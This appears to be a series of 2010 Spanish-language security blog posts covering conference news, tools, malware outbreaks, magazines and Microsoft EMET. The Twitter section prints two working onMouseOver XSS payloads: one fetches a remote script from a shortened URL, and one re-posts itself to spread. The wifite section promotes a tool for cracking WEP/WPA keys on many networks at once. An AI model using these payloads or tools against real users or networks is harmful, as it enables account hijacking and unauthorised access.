Presentaciones de la BruCON

El pasado fin de semana se celebró en Bruselas la BruCON 2010, un evento anual de seguridad y hacking que ofrece dos días (22-23 de septiembre) de cursos impartidos por expertos y dos días (24-25 de septiembre) de conferencias con grandes ponentes, retos de seguridad e interesantes workshops.

Además, en esta segunda BruCON se publicó la pre-release de Samurai WTF 0.9 y Didier Steven sorprendió con un magnífico e-book sobre análisis de PDFs maliciosos.

Actualmente están terminando de preparar los videos para subirlos a la web pero ya es posible descargar podcasts y la mayoría de las presentaciones:

wifite - Herramienta para cracking masivo de claves WEP/WPA

Wifite es una herramienta capaz de atacar a múltiples redes cifradas con WEP y WPA al mismo tiempo. Está diseñada para la distribución Ubuntu de Backtrack 4 RC1 y entre sus principales características destaca:
- Clasifica los objetivos por potencia de la señal (en dB); primero crackea los puntos de accesos más cercanos
- Todos las negociaciones WPA son salvadas (al directorio de trabajo correspondiente de wifite.py)

- Incluye opciones de "mid-attacks": parar un ataque con Ctrl+C para ver las opciones de continuar, cambiar al siguiente objetivo, saltar el crackeo o salir

- Numerosos filtros para especificar exactamente que hay que atacar (wep/wpa/ambos, fuerza de la señal, canales, etc.)
- Posee opciones muy configurables (timeouts, paquetes/segundo, etc.)

- Soporte SKA (no certificado)

- Encuentra dispositivos en el modo monitor, si no, solicita uno

- Todas las contraseñas son guardadas en el fichero log.txt

- El cambio entre ataques WEP no resetea los IVs

- Muestra un resumen de la sesión al salir; muestra las contraseñas crackeadas


Podéis descargarlo aquí:
wifite.py

Informe de Transparencia de Google contra la censura de los gobiernos

Washington (EFE).- Google lanzó hoy una nueva herramienta que permitirá a los usuarios saber cuándo un Gobierno está bloqueando el tráfico a su buscador, con la intención de que disuada a ciertos países de ejercer la censura.

La herramienta, llamada "Informe de Transparencia", identifica los trastornos en el tráfico del buscador y "determina si se deben a problemas mecánicos o si están provocados por un Gobierno", según explicó hoy la compañía en su blog oficial.

"Creemos que este tipo de transparencia puede ser un elemento disuasorio contra la censura", señala el comunicado.

La nueva opción reemplaza el gráfico dedicado exclusivamente a mostrar la disponibilidad de servicio en la China continental, tras unos meses de tensiones especialmente agudas con el Gobierno del país asiático.

A finales de julio, Google volvió a ser bloqueado en China, cuatro meses después de negarse a censurar los resultados de los asuntos que el Ejecutivo considera sensibles -como la matanza de Tiananmen o la represión en Tíbet y Xinjiang- y comenzó a redirigir las búsquedas continentales a su buscador con sede en Hong Kong.

enlarge your URL!

Hoy en día Twitter está siendo uno de los principales objetivos para explotar nuevas vulnerabilidades y probar diversos tipos de ataques. Sirva de ejemplo el último y reciente XSS que, aunque ya ha sido corregido, ha podido afectar en tan sólo unas horas a muchos usuarios simplemente pasando el cursor del ratón por encima del tuit malicioso (onMouseOver):

código ejemplo 1:
$('#status').val("http://t.co/@\"style=\"font-size:999999999999px;\"onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
$('.status-update-form').submit();

código ejemplo 2:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()

Sin embargo muchas veces no es necesario ninguna vulnerabilidad para que seamos redireccionados a un sitio malicioso... simplemente pinchamos una URL acortada con demasiada ligereza.

SPSA 1.5: un IDS en pocos minutos

SPSA (Snorby Preconfigured Security Application) es una distribución basada en Ubuntu 8.04.3 Hardy (Turnkey Linux Core) que te permitirá disponer sin esfuerzo y en pocos minutos de un IDS con Snort y el nuevo y moderno front-end Snorby.

La última versión (1.5), publicada el pasado 30 de agosto, incluye los siguientes cambios:

* Activado el soporte de informes por correo electrónico (Postfix Gmail relay o Snorby standalone mode)
* Nuevo script de arranque start/stop de Snort
* Añadido snort 2.8.6.1-1
* Corregidos certificados ssl de oinkmaster ssl
* Corregidas las reglas para amenazas emergentes

La FOCA en Linux [2 de 2]

La FOCA es una aplicación gratuita pero no es de código abierto. Sabemos que está programada en C# y que necesita el framework .NET para funcionar. Sólo con esto, veremos lo sencillo que es hacer que la FOCA muerda el anzuelo para que funcione en Linux…

Lo primero que se me ocurrió fue utilizar Mono (¡esto parece un zoo!), precisamente una implementación del framework .NET de Microsoft, multiplataforma y basado en los estándares ECMA para C# y el CLR (Common Language Runtime). Tras varias pruebas al final desistí y determiné que la FOCA no funcionaba (o no supe hacerla funcionar) con Mono. No obstante sí que aproveché el IDE Monodevelop para depurar el ejecutable de la FOCA en mi Windows 7 y, a través del log de la traza de la aplicación, ver los módulos que carga en tiempo real. El objetivo: copiar las DLLs adicionales que utiliza para llevárnoslas al sistema operativo Linux:

10/06/2009 23:22 10.752 Accessibility.dll
19/04/2010 10:34 17.920 Microsoft.VisualStudio.HostingProcess.Utilities.Sync.dll
21/05/2010 00:49 4.550.656 mscorlib.dll
14/07/2009 10:47 307.200 mscorlib.Resources.dll
10/06/2009 23:14 110.592 SMdiagnostics.dll
10/06/2009 23:23 425.984 System.configuration.dll
10/06/2009 23:14 667.648 System.Core.dll
14/07/2009 10:48 61.440 System.Core.Resources.dll
10/06/2009 23:23 3.178.496 System.dll
10/06/2009 23:23 626.688 System.Drawing.dll
14/07/2009 10:47 204.800 system.Resources.dll
10/06/2009 23:13 970.752 System.Runtime.Serialization.dll
14/07/2009 10:48 98.304 System.RunTime.Serialization.Resources.dll
10/06/2009 23:13 5.963.776 System.ServiceModel.dll
10/06/2009 23:14 569.344 System.ServiceModel.Web.dll
10/06/2009 23:23 5.242.880 System.Web.dll
10/06/2009 23:23 5.025.792 System.Windows.Forms.dll
14/07/2009 10:47 425.984 System.Windows.Forms.Resources.dll
10/06/2009 23:23 2.048.000 System.XML.dll
14/07/2009 10:47 163.840 System.xml.Resources.dll
03/03/2010 01:24 1.249.280 WindowsBase.dll

La FOCA en Linux [1 de 2]

La verdad es que la FOCA (Fingerprinting Organizations with Collected Archives) es una de esas herramientas que me hubiese gustado tener incluso unos años antes, fundamentalmente por la cantidad de trabajo que te ahorra en algunos proyectos y auditorías.

Ahora la última versión de la FOCA es sexy, trae funciones nuevas y un logo cojonudo (hecho por el creador de Cálico Electrónico) y la utilizan empresas, agencias de seguridad gubernamentales, pentesters e incluso “hackers”.

Si todavía no conoces la FOCA, decirte que es una herramienta que automatiza la recolección de información sobre una organización. Principalmente utiliza varios motores de búsqueda para descubrir ficheros en un sitio web, descargarlos y analizar sus metadatos descubriendo direcciones de correo electrónico, nombres de usuario, versiones de software, sistemas operativos, nombres y direcciones IP de servidores internos, impresoras, unidades de red mapeadas, etc.

Libro: The Rootkit Arsenal

The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System (traducido al castellano como 'El arsenal Rootkit: escape y evasión en los oscuros rincones del sistema') es un título escrito por Bill Blunden, publicado por Jones & Bartlett en mayo del 2009.

El libro conduce al lector hacia la tecnología de los rootkits y sus usos. Se tratan temas como el ensamblado en IA-32, la arquitectura del sistema Windows, la depuración del kernel, el desarrollo avanzado de rootkits y mucho más alrededor de esta tecnología y su aplicación.

El libro también proporciona muchos ejemplos de código fuente sobre el desarrollo de rootkits y cómo utilizarlos correctamente. Eso sí, es recomendable tener una buena comprensión previa en programación de computadoras y sistemas operativos con el fin de comprender plenamente el contenido del libro.

Si os interesa el tema de los rootkits, ¡no lo dudeis y echar un vistazo a esta gran obra!

VBMania: nuevo gusano masivo por mail

El mundo de la seguridad informática anda un poco más revuelto desde ayer debido a un nuevo gusano que viene pegando fuerte y que se extiende por correo electrónico usando las libretas de direcciones, a la vieja usanza, tal y como lo hicieron hace 10 años el famoso 'ILoveYou' y un poco después VBS@MM (Anna Kournikova).

En esta ocasión el malware, bautizado como W32/VBMania@mm (también Meylme.b, Imsolk.b, Visal.b, ...) utiliza también adjuntos en el email bajo el título “Here you have” para extenderse, e incluye un archivo .scr disfrazado de PDF. El email pide a los usuarios que comprueben el contenido, que es lo que descarga y activa el malware: password stealers para navegadores y el RAT Bitfrost. El gancho: el acceso a un documento PDF o la descarga gratis de películas porno...

El ataque se ha extendido rápidamente y mientras que ayer el número de infecciones se cifraban en 60.000, ahora se habla de cientos de miles de equipos infectados y, entre otras, han sido afectadas grandes empresas como ABC/Disney, Google o Coca Cola.

Un experto en seguridad afirma que cuando se ejecuta el archivo .scr se descargan herramientas, una de las cuales parece intentar registrarse como un controlador. Después el malware intenta desactivar los paquetes antivirus y utiliza la libreta de direcciones de Outlook para enviar spam. Desde McAfee refieren que el malware instala una aplicación llamada CSRSS.EXE en la máquina infectada y después utiliza el email para auto-enviarse a través de máquinas remotas accesibles.

Eavesdropping de "vigila bebés"

Permitirme que me salga un poquito del guión porque, no hace mucho y hablando de bebés (¡vaya mundo!), un colega me contó una curiosa historia que quería comentaros: resulta que una noche unos amigos observaron atónitos a través de la pantalla de su intercomunicador cómo un extraño se acercaba a la cuna y cogía a su bebé en brazos.

Con el alma en los pies, se abalanzaron hacia la habitación y cuando entraron vieron a su niño dormido, en la misma posición y como si nada. Lo que habían visto en el pequeño monitor era la imagen del comunicador de sus vecinos… habían interceptado accidentalmente su señal.

Si, hablo de interceptación, también llamada eavesdropping, bugging o passive wiretapping y, en el caso de radio frecuencias de escuchas de bebés, ayer mismo comprobé que es tan real como fácil toparse con ello. Bastó con encender mi receptor, seleccionar el segundo canal (y eso que sólo tiene cuatro) y observar, con ciertas interferencias, al bebé de un vecino durmiendo plácidamente…

Técnicas de mitigación con Microsoft EMET

Microsoft ha publicado recientemente la versión 2.0.0 de su Enhanced Mitigation Experience Toolkit (EMET).

Se trata de un toolkit diseñado para administrar fácilmente las tecnologías de seguridad de mitigación de Microsoft, aplicándolas a través de políticas generales de sistema o bien directamente sobre un ejecutable de una aplicación de terceros. El objetivo final es minimizar el éxito de exploits frente a vulnerabilidades de software, incluido 0-days.

Esta nueva versión viene con un GUI (la versión anterior sólo funcionaba por consola) e incluye dos nuevas técnicas de mitigación: EAF y ASLR.

Sin embargo, EMET podrá aplicar o no todas las técnicas de mitigación dependiendo del sistema operativo donde se instale y de la arquitectura del sistema (32 o 64 bits), tal y como se indica en las siguientes tablas:


Comprometido el Blog del Hacker: Twetti

Esta mañana, como casi todos los días, me disponía a ver que se cuece en el mundillo de la seguridad informática a través del blogroll en español de Hackplayers cuando de repente mi AV empezaba a cantar:


Parece que uno de los blogs más desactualizados de la lista, el Blog del Hacker, había sido comprometido a través de un supuesto y peligroso exploit drive-by download. Inmediatamente lo he quitado del blogroll (junto con Shell Security) y he echado un vistazo rápido para confirmarlo.

Primero
al abrir la web con nuestro navegador (en una máquina virtual por supuesto), el AV indica también la presencia en el javascript ' http://www.blogdelhacker.com/wp-content/themes/hal/js/sweetTitles.js' del viejo NeoSploit Exploit Kit.

Insecure Magazine # 27 (Septiembre 2010)

Y es que la cosa hoy va de revistas... acabo de leer una entrada en el blog de Javier Cao avisando de la publicación de un nuevo número de otro buen magazine: (IN)Secure. Aquí os dejo también los contenidos:

-Review: BlockMaster SafeStick secure USB flash drive
-The devil is in the details: Securing the enterprise against the cloud
-Cybercrime may be on the rise, but authentication evolves to defeat it
-Learning from bruteforcers
-PCI DSS v1.3: Vital to the emerging demand for virtualization and cloud security
-Security testing - the key to software quality
-A brief history of security and the mobile enterprise
-Payment card security: Risk and control assessments
-Security as a process: Does your security team fuzz?
-Book review: Designing Network Security, 2nd Edition
-Intelligent security: Countering sophisticated fraud

Nuevo número de Hakin9: el malware en los móviles - la nueva ciberamenaza

Llega septiempre y ya podemos descargar y disfrutar de un nuevo número (Vol.5 No.8) de la revista Hakin9 en la que encontraremos los siguientes contenidos:

Habituales
En general
-Últimas noticias desde el mundo de la seguridad IT
Herramientas
-Implementando redes inalámbricas usando el curso de HP ProCurve MultiService Mobility Solution
El experto en fraude dice...
-El malware en los móviles - la nueva ciberamenaza

Básico
-Botnet: las seis leyes y los vectores C&C sumergidos

Ataque
-Hacking de relaciones de confianza - Parte 2

-Web Malware - Parte 2
-Actuando sobre layer-2 - Ataques en VoIP
-Armando malware: ocultando datos dentro de datos

Defensa
-¿Están los antivirus muertos? Las respuesta es SÍ. Aquí vemos por qué...